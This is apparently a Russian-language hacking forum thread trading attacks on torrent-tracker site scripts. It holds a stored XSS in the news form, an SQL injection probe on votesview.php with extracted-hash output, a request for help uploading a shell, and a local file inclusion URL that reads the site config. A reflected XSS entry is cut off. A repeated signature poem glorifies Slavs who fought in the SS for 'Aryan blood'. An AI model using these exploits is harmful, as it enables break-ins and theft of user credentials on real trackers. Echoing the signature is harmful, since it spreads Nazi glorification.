роли не какой не играет так как привязка IP к кукам но всё же
Имеем xss в Новостях При создание в поле "Тема"

Люди хелп, если зайти на трекер провайдера по адресу
Получим это:
Тут есть уязвимость?
Раскажите плиз кто нибуть по подробнее

Твое passkey[]= даст тебе только раскрытие путей, но не больше , а про rss.php читай, если не проходит SQL значит пофиксенный rss

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

votesview.php?requestid=-99'



А вообще помогите через неё шелл залить/прочитать файл...

votesview.php есть в YSE немного старее чем с СВН, да и в tbsource дефульт есть

Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?

не правильный id/ пропатченная версия двига

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

HAXTA4OK, понятно... :S

Восстанавливаем забытую тему =)

Уязвимость скрипта: modal_mailbox.php (чат)

Тип: Локальный Инклуд

Уязвимый параметр: ?action

Exploit:http://examle.com/modal_mailbox.php?action=../include/config

Внимание, возможно потребуется регистрация на сайте.

Автор: OxoTnik

Небольшой UP

passive XSS (reflected)

Уязвимый сценарий: redirector.php

Exploit: